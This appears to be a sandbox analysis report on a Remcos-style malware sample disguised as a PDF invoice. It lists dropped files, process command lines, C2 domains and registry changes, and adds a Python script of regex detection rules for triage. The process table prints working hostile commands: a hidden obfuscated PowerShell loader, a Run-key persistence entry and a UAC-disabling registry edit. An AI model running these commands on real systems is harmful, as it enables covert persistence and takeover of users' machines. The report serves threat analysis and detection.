Files

| File Path | Type | Category |
|---|---|---|
| IT01879020517_uGIim_xml#U00b7pdf.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | initial sample |
| C:\ProgramData\remcos\logs.dat | data | modified |
| C:\Users\user\AppData\Local\Temp\Loupen.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | dropped |
| C:\Users\user\AppData\Local\Temp\Loupen.exe:Zone.Identifier | ASCII text, with CRLF line terminators | dropped |
| C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\BgImage.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
| C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\UserInfo.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
| C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\nsDialogs.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und | ASCII text, with very long lines (65536), with no line terminators | dropped |
| C:\ProgramData\Microsoft\Network\Downloader\edb.log | data | dropped |
| C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | Extensible storage engine DataBase, version 0x620, checksum 0xb598f686, page size 16384, DirtyShutdown, Windows version 10.0 | dropped |
| C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | data | dropped |
| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_763cc06ddd191e0b2a3c26e6eec71deecc9f88_f469684b_67036ab9-a9a5-4c9a-8111-79a84e4dcabe\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
| C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_eeb76350ac29bb3b486937f9169f68096e924e2_f469684b_5f7c8348-3926-4c3f-a256-55d37fae53f0\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E5A.tmp.dmp | Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:38 2024, 0x1205a4 type | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WER8129.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WER8169.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6BD.tmp.dmp | Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:56 2024, 0x1205a4 type | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8C2.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
| C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8E2.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json | JSON data | dropped |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2ol2ewj.pcu.psm1 | ASCII text, with no line terminators | dropped |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xy2loq3c.gjs.ps1 | ASCII text, with no line terminators | dropped |
| C:\Users\user\AppData\Local\Temp\bhv7B7B.tmp | Extensible storage engine DataBase, version 0x620, checksum 0xa18356d8, page size 32768, DirtyShutdown, Windows version 10.0 | dropped |
| C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta | Unicode text, UTF-16, little-endian text, with no line terminators | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Farvebaandsomskifteren.txt | ASCII text, with CRLF line terminators | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Montanes176.opt | Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672 | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Wafery.unt | data | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\barsel.pul | data | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\migraines.sla | PGP symmetric key encrypted data - Plaintext or unencrypted data | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tegnmssig.bra | data | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tradionsbevarende.unp | data | dropped |
| C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Neuraxial.Aca | data | dropped |
| C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | JSON data | dropped |
| C:\Windows\appcompat\Programs\Amcache.hve | MS Windows registry file, NT/2000 or above | dropped |

25 additional files are not shown in this listing.
Processes

| Path | Cmdline |
|---|---|
| C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe | "C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)" |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)" |
| C:\Windows\SysWOW64\reg.exe | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)" |
| C:\Windows\SysWOW64\cmd.exe | /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f |
| C:\Windows\SysWOW64\reg.exe | C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\usqirflqwomfxiavdrsyibgadyvbmltib" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx" |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 4200 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 4276 |

6 additional processes are not shown in this listing.
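Four of the command lines above carry the actionable signal in this report, and a triage script should pull them apart rather than just match on `powershell.exe`. The hidden-window PowerShell reads `Rockmusikkens.Und` and uses a three-character substring at offset 70893 as the command name, so the invoke verb never appears on the command line. The Run-key entry `Soumansite` is `REG_EXPAND_SZ` and starts with `%Nostocaceae%`, an environment variable defined under `HKCU\Environment` (see the Registry table), so the interpreter path is not in the Run value itself, and the script body is read from `HKCU\Exhusband\Dairywomen`. `EnableLUA` set to 0 under `HKLM\...\Policies\System` turns off UAC (it needs an elevated writer and takes effect after a reboot). Finally, `/stext <file>` is not a powershell.exe switch; it is the NirSoft command-line convention for saving recovered data to a text file, which is consistent with the `www.nirsoft.net` string in the URLs table and with the UTF-16 text files that appear in `%TEMP%` under the same random names, i.e. a recovery tool running inside the PowerShell host. The Python below is added here as an example and is not part of the sandbox report or of any vendor tool: it runs regex rules over those command lines (copied from the table; the conhost and WerFault lines are included as benign controls) and extracts the file, registry and environment-variable names they reference. The rule names, the `Finding` class and `scan()`/`rules_hit()` are this example's own.

```python
"""Triage the process command lines from the sandbox report above.

Added example: the rule names, the Finding class and scan()/rules_hit() are this
example's own naming, not sandbox output and not part of any vendor tool.
"""
import re
from dataclasses import dataclass, field

# Command lines copied from the Processes table (one per distinct pattern);
# the conhost and WerFault lines are included as benign controls.
PROCESS_CMDLINES = [
    r'"C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe"',
    r'''"powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)"''',
    r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"''',
    r'''C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f''',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta"''',
    r'''C:\Windows\system32\conhost.exe 0xffffffff -ForceV1''',
    r'''C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 4200''',
]

FLAGS = re.IGNORECASE | re.DOTALL


@dataclass
class Finding:
    rule: str
    index: int                     # position of the command line in the scanned list
    details: dict = field(default_factory=dict)


def _staged_script_details(cmd):
    """File read by Get-Content and the (offset, length) of the substring used as the verb."""
    d = {}
    m = re.search(r"Get-Content\s+'([^']+)'", cmd, FLAGS)
    if m:
        d["script_file"] = m.group(1)
    m = re.search(r"\.SubString\((\d+)\s*,\s*(\d+)\)", cmd, FLAGS)
    if m:
        d["verb_offset"], d["verb_length"] = int(m.group(1)), int(m.group(2))
    return d


def _run_key_details(cmd):
    """Run value name, the env var that hides the interpreter, and where the body is read from."""
    d = {}
    m = re.search(r'/v\s+"?([^"\s]+)"?', cmd, FLAGS)
    if m:
        d["run_value_name"] = m.group(1)
    m = re.search(r'/d\s+"?%(\w+)%', cmd, FLAGS)
    if m:
        d["launcher_env_var"] = m.group(1)
    m = re.search(r"Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\.(\w+)", cmd, FLAGS)
    if m:
        d["payload_key"], d["payload_value"] = m.group(1), m.group(2)
    return d


def _stext_details(cmd):
    """Output file the NirSoft-style /stext switch writes to."""
    m = re.search(r'/stext\s+"?([^"]+?)"?\s*$', cmd, FLAGS)
    return {"output_file": m.group(1)} if m else {}


# (rule name, pattern, extractor of IOC-like details or None)
RULES = [
    ("powershell_hidden_staged_script",
     re.compile(r'powershell.*?-windowstyle\s+hidden.*?Get-Content.*?\.SubString\(.*?\.\$\w+\(', FLAGS),
     _staged_script_details),
    ("run_key_launcher_via_env_var",
     re.compile(r'\breg(?:\.exe)?\s+add\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b'
                r'.*?/t\s+REG_EXPAND_SZ\b.*?/d\s+"?%\w+%', FLAGS),
     _run_key_details),
    ("uac_disabled_enablelua_0",
     re.compile(r'\breg(?:\.exe)?\s+add\s+HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\b'
                r'.*?/v\s+EnableLUA\b.*?/d\s+0\b', FLAGS),
     None),
    ("stext_switch_in_powershell_host",
     re.compile(r'powershell\.exe"?\s+/stext\s', FLAGS),
     _stext_details),
]


def scan(cmdlines):
    """Return one Finding per (command line, rule) match, with extracted details."""
    findings = []
    for i, cmd in enumerate(cmdlines):
        for name, pattern, extractor in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, i, extractor(cmd) if extractor else {}))
    return findings


def rules_hit(cmdlines):
    """Sorted, de-duplicated names of the rules that fired."""
    return sorted({f.rule for f in scan(cmdlines)})


if __name__ == "__main__":
    for f in scan(PROCESS_CMDLINES):
        print(f"[{f.rule}] cmdline {f.index}: {f.details}")
```

Run it as a script to print the four findings. The same rules can be pointed at the command-line field of Sysmon event 1 or Security event 4688; note that the HKLM rule also fires on the `cmd.exe /k %windir%\System32\reg.exe ...` wrapper line in the table, because it keys on `reg` followed by the key path rather than on the image name.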
URLs

| Name | IP |
|---|---|
| http://nuget.org/NuGet.exe | unknown |
| http://www.imvu.comr | unknown |
| http://pesterbdd.com/images/Pester.png | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown |
| https://aka.ms/pscore6lBeq | unknown |
| https://contoso.com/License | unknown |
| http://www.imvu.com | unknown |
| https://contoso.com/Icon | unknown |
| http://crl.ver) | unknown |
| http://geoplugin.net/json.gpr | unknown |
| https://drive.usercontent.google.com/ | unknown |
| https://g.live.com/odclientsettings/ProdV2.C: | unknown |
| http://upx.sf.net | unknown |
| http://nsis.sf.net/NSIS_ErrorError | unknown |
| https://github.com/Pester/Pester | unknown |
| http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | unknown |
| http://geoplugin.net/json.gp | 178.237.33.50 |
| https://g.live.com/odclientsettings/Prod.C: | unknown |
| https://www.google.com | unknown |
| http://nsis.sf.net/NSIS_Error | unknown |
| https://drive.google.com/ | unknown |
| https://contoso.com/ | unknown |
| https://nuget.org/nuget.exe | unknown |
| https://apis.google.com | unknown |
| http://www.nirsoft.net/ | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
| http://www.ebuddy.com | unknown |

17 additional URLs are not shown in this listing.
Domains

| Name | IP |
|---|---|
| a458386d9.duckdns.org | 217.76.50.73 |
| geoplugin.net | 178.237.33.50 |
| drive.google.com | 142.250.185.206 |
| drive.usercontent.google.com | 172.217.18.1 |
IPs

| IP | Domain | Country |
|---|---|---|
| 217.76.50.73 | a458386d9.duckdns.org | Sweden |
| 142.250.185.206 | drive.google.com | United States |
| 178.237.33.50 | geoplugin.net | Netherlands |
| 127.0.0.1 | unknown | unknown |
| 172.217.18.1 | drive.usercontent.google.com | United States |
Registry

| Path | Value |
|---|---|
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | EnableLUA |
| HKEY_CURRENT_USER\Exhusband | Dairywomen |
| HKEY_CURRENT_USER\Environment | Nostocaceae |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D | exepath |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D | licence |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D | time |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Soumansite |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS | PerfMMFileName |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | ProgramId |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | FileId |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | LowerCaseLongPath |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | LongPathHash |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Name |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | OriginalFileName |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Publisher |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Version |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | BinFileVersion |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | BinaryType |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | ProductName |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | ProductVersion |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | LinkDate |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | BinProductVersion |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | AppxPackageFullName |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | AppxPackageRelativeId |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Size |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Language |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | IsOsComponent |
| \REGISTRY\A\{243ce608-1f7b-4d88-0533-9eca206d5b25}\Root\InventoryApplicationFile\powershell.exe\|bdbb2c1d41b249e7 | Usn |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property | 0018800FB4CA6152 |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} | DeviceTicket |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} | DeviceId |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} | ApplicationFlags |

22 additional registry entries are not shown in this listing.
Memdumps

| Base Address | Region type | Protect |
|---|---|---|
| 7933000 | unknown | page read and write |
| 8A60000 | unknown | page read and write |
| 8B36000 | unknown | page read and write |
| 8B79000 | unknown | page read and write |
| 7C9D000 | unknown | page read and write |
| 8B65000 | unknown | page read and write |
| 3200000 | heap | page read and write |
| 8A40000 | unknown | page read and write |
| 88FC000 | unknown | page read and write |
| 71B0000 | heap | page execute and read and write |
| 154D1861000 | trusted library allocation | page read and write |
| AD0000 | heap | page read and write |
| 5101000 | unknown | page read and write |
| 154D17E0000 | trusted library allocation | page read and write |
| 60A9000 | unknown | page read and write |
| 3020000 | unknown | page readonly |
| 650000 | heap | page read and write |
| 154CCC02000 | heap | page read and write |
| 3428000 | heap | page read and write |
| 723C000 | unknown | page read and write |
| 7340000 | unknown | page read and write |
| D0BA000 | unknown | page execute and read and write |
| 77C0000 | unknown | page read and write |
| 2770A7C000 | stack | page read and write |
| 2E50000 | unknown | page read and write |
| 3420000 | heap | page read and write |
| C6BA000 | unknown | page execute and read and write |
| 154CD7D0000 | trusted library allocation | page read and write |
| 154CC473000 | heap | page read and write |
| 80CC000 | unknown | page execute and read and write |
| 430000 | unknown | page read and write |
| 154D1860000 | trusted library allocation | page read and write |
| 154D2000000 | heap | page read and write |
| 154CC42B000 | heap | page read and write |
| 154D1AC7000 | heap | page read and write |
| 277007E000 | unknown | page readonly |
| 8A3C000 | unknown | page read and write |
| 3010000 | unknown | page readonly |
| 7C00000 | unknown | page read and write |
| 8E0E000 | unknown | page read and write |
| 154D1A1F000 | heap | page read and write |
| B2BA000 | unknown | page execute and read and write |
| 154CC280000 | heap | page read and write |
| 71FD000 | unknown | page read and write |
| 7B70000 | unknown | page read and write |
| 276FFFE000 | stack | page read and write |
| 154D1AC0000 | heap | page read and write |
| 2E53000 | unknown | page read and write |
| 8720000 | heap | page read and write |
| 73D0000 | unknown | page read and write |
| 7DDF000 | unknown | page read and write |
| 440000 | unknown | page readonly |
| 33B4000 | unknown | page read and write |
| 836C000 | unknown | page read and write |
| 334E000 | unknown | page read and write |
| 4D57000 | heap | page read and write |
| 2E14000 | unknown | page read and write |
| 8AF4000 | unknown | page read and write |
| 154D1AB4000 | heap | page read and write |
| 4C0E000 | unknown | page read and write |
| 276FE7E000 | unknown | page readonly |
| 1FD000 | stack | page read and write |
| 4C80000 | unknown | page execute and read and write |
| 80F0000 | unknown | page read and write |
| 154D1840000 | trusted library allocation | page read and write |
| 8B93000 | unknown | page read and write |
| 7C20000 | unknown | page read and write |
| 154D1A2C000 | heap | page read and write |
| 27702FE000 | stack | page read and write |
| 7320000 | unknown | page read and write |
| 8900000 | unknown | page read and write |
| 34F0000 | heap | page read and write |
| 400000 | unknown | page readonly |
| 154D1940000 | trusted library allocation | page read and write |
| 154D1880000 | trusted library allocation | page read and write |
| 23D0000 | heap | page read and write |
| 623A000 | unknown | page read and write |
| 468000 | heap | page read and write |
| 7CDE000 | unknown | page read and write |
| 78F8000 | unknown | page read and write |
| 2E4A000 | unknown | page read and write |
| 154CC513000 | heap | page read and write |
| 40A000 | unknown | page read and write |
| 33DA000 | unknown | page execute and read and write |
| 40A000 | unknown | page write copy |
| 50A1000 | unknown | page read and write |
| 277037E000 | unknown | page readonly |
| 2E1D000 | unknown | page read and write |
| 154D1A91000 | heap | page read and write |
| 277097E000 | unknown | page readonly |
| 154D1930000 | trusted library allocation | page read and write |
| 3178000 | heap | page read and write |
| 72C0000 | unknown | page read and write |
| 7BB0000 | unknown | page read and write |
| 85E1000 | trusted library allocation | page execute and read and write |
| 8770000 | unknown | page read and write |
| 277077E000 | unknown | page readonly |
| 276FC7E000 | unknown | page readonly |
| 73C0000 | unknown | page read and write |
| 154CCE91000 | trusted library allocation | page read and write |
| 5C0000 | heap | page read and write |
| 59F000 | stack | page read and write |
| 7290000 | unknown | page read and write |
| 7EDF000 | unknown | page read and write |
| 154D1AE2000 | heap | page read and write |
| 154D1890000 | trusted library allocation | page read and write |
| 6D0000 | heap | page read and write |
| 79F0000 | unknown | page readonly |
| 72D0000 | unknown | page read and write |
| 33B0000 | unknown | page read and write |
| 7C50000 | unknown | page read and write |
| 154CCD00000 | heap | page read and write |
| 6CB000 | heap | page read and write |
| 15D000 | stack | page read and write |
| A7F000 | stack | page read and write |
| 34FB000 | heap | page read and write |
| 154CC502000 | heap | page read and write |
| 43E000 | unknown | page read and write |
| 154D1890000 | trusted library allocation | page read and write |
| 33A0000 | unknown | page read and write |
| 711E000 | unknown | page read and write |
| 77C2000 | unknown | page read and write |
| 154CC400000 | heap | page read and write |
| 7F3B000 | unknown | page execute and read and write |
| 2990000 | heap | page read and write |
| 8CFE000 | unknown | page read and write |
| 28C9E000 | unknown | page read and write |
| 154CCD1A000 | heap | page read and write |
| 7A50000 | unknown | page read and write |
| 154D1A4E000 | heap | page read and write |
| 31F0000 | heap | page read and write |
| 32B0000 | unknown | page read and write |
| 78C7000 | unknown | page read and write |
| 286F000 | stack | page read and write |
| 154CCC15000 | heap | page read and write |
| 8070000 | unknown | page execute and read and write |
| 7390000 | unknown | page read and write |
| 71B5000 | heap | page execute and read and write |
| 7380000 | unknown | page read and write |
| 154CC490000 | heap | page read and write |
| 8650000 | unknown | page read and write |
| 154CD250000 | trusted library section | page readonly |
| 60A1000 | unknown | page read and write |
| 4D20000 | unknown | page read and write |
| 400000 | heap | page read and write |
| 277067A000 | stack | page read and write |
| 408000 | unknown | page readonly |
| 440000 | unknown | page readonly |
| 154D1B02000 | heap | page read and write |
| 154CC4A0000 | heap | page read and write |
| 97F000 | stack | page read and write |
| 154D1A87000 | heap | page read and write |
| 7528000 | unknown | page read and write |
| 3230000 | heap | page read and write |
| 438000 | unknown | page read and write |
| 154CD7A1000 | trusted library allocation | page read and write |
| 154D1AFA000 | heap | page read and write |
| 89FC000 | unknown | page read and write |
| 154D19C0000 | trusted library allocation | page read and write |
| 460000 | heap | page read and write |
| 7BF0000 | unknown | page read and write |
| 8C70000 | unknown | page read and write |
| 6CE000 | heap | page read and write |
| 154CC478000 | heap | page read and write |
| 154D1860000 | trusted library allocation | page read and write |
| 276FB7B000 | stack | page read and write |
| 22CE000 | stack | page read and write |
| 6B9000 | heap | page read and write |
| 7700000 | unknown | page read and write |
| 3512000 | heap | page read and write |
| 8C50000 | unknown | page read and write |
| 2D8C000 | stack | page read and write |
| 36EF000 | stack | page read and write |
| 4D0000 | heap | page read and write |
| 8549000 | unknown | page execute and read and write |
| 60C9000 | unknown | page read and write |
| 7370000 | unknown | page read and write |
| 154D1AC2000 | heap | page read and write |
| 154D19B0000 | trusted library allocation | page read and write |
| 7BA0000 | unknown | page read and write |
| 450000 | heap | page read and write |
| 8BB0000 | unknown | page read and write |
| 3410000 | unknown | page readonly |
| 7A20000 | unknown | page read and write |
| 3126000 | heap | page read and write |
| 7A40000 | unknown | page read and write |
| 154CC3B0000 | trusted library allocation | page read and write |
| 154D1C00000 | remote allocation | page read and write |
| 72A0000 | unknown | page read and write |
| 345E000 | unknown | page read and write |
| 7B2E000 | unknown | page read and write |
| 400000 | unknown | page readonly |
| 3400000 | unknown | page read and write |
| 688000 | heap | page read and write |
| 8750000 | unknown | page read and write |
| 57E000 | stack | page read and write |
| 77D2000 | unknown | page read and write |
| 2E1A000 | unknown | page read and write |
| 8740000 | unknown | page read and write |
| 2E38000 | unknown | page read and write |
| 154CD140000 | trusted library allocation | page read and write |
| 154CC4AE000 | heap | page read and write |
| 2770B7E000 | unknown | page readonly |
| 7FDD0000 | unknown | page execute and read and write |
| 680000 | heap | page read and write |
| 154D1850000 | trusted library allocation | page read and write |
| 3350000 | heap | page read and write |
| 7B90000 | unknown | page read and write |
| 154CC413000 | heap | page read and write |
| 76FB000 | unknown | page read and write |
| 4CDC000 | unknown | page read and write |
| 72E0000 | unknown | page read and write |
| 73A0000 | unknown | page read and write |
| 2500000 | heap | page read and write |
| E9F7000 | unknown | page read and write |
| 897C000 | unknown | page read and write |
| 5BE000 | stack | page read and write |
| 154CC4A2000 | heap | page read and write |
| 87F000 | stack | page read and write |
| 435000 | unknown | page read and write |
| 72F0000 | unknown | page read and write |
| 27EF000 | stack | page read and write |
| 2E47000 | unknown | page read and write |
| 154CC529000 | heap | page read and write |
| 2ECD000 | stack | page read and write |
| 4D1D000 | unknown | page read and write |
| 19A000 | stack | page read and write |
| 4A0000 | heap | page read and write |
| 86CE000 | unknown | page read and write |
| 33B3000 | unknown | page execute and read and write |
| 715D000 | unknown | page read and write |
| 32AE000 | unknown | page read and write |
| 3760000 | heap | page read and write |
| 87D0000 | unknown | page read and write |
| 154CD380000 | trusted library allocation | page read and write |
| 276F57E000 | stack | page read and write |
| 27700FE000 | stack | page read and write |
| 2E29000 | unknown | page read and write |
| 7926000 | unknown | page read and write |
| 816A000 | unknown | page read and write |
| 93E0000 | unknown | page execute and read and write |
| 88B5000 | unknown | page read and write |
| 4C68000 | unknown | page read and write |
| 2E41000 | unknown | page read and write |
| 85F6000 | trusted library allocation | page execute and read and write |
| 7A30000 | unknown | page read and write |
| 7310000 | unknown | page read and write |
| 8670000 | unknown | page readonly |
| 154D1990000 | trusted library allocation | page read and write |
| 78F0000 | unknown | page read and write |
| 44E000 | stack | page read and write |
| 7BD0000 | unknown | page read and write |
| 27704FE000 | stack | page read and write |
| 154CC47C000 | heap | page read and write |
| 335E000 | unknown | page read and write |
| 276FD7B000 | stack | page read and write |
| 7350000 | unknown | page read and write |
| 8CBE000 | unknown | page read and write |
| 276F97C000 | stack | page read and write |
| 276FA7E000 | unknown | page readonly |
| 5E0000 | heap | page read and write |
| 23CF000 | stack | page read and write |
